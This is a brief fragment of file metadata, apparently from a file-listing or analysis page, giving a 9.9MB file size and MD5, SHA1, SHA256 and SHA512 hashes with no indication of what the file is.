SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376
-
Filesize
9.9MB
MD5682c9ab4c7d0f444582d4ea61abae9e3
SHA111e415e38674c1fb98cacaead3776fc3c573070b
SHA25623f33f5549b6925fc884306b4abd3aa23ebadb3c5b9742cfe653473e88d9961a
SHA51232c1f21910208346c3f853e733b78fd3a3aea70a831dec05f543f076651832b354d70c0930573c3bf41da610c308316e19194ed32dbaa0157adf5231c16905bf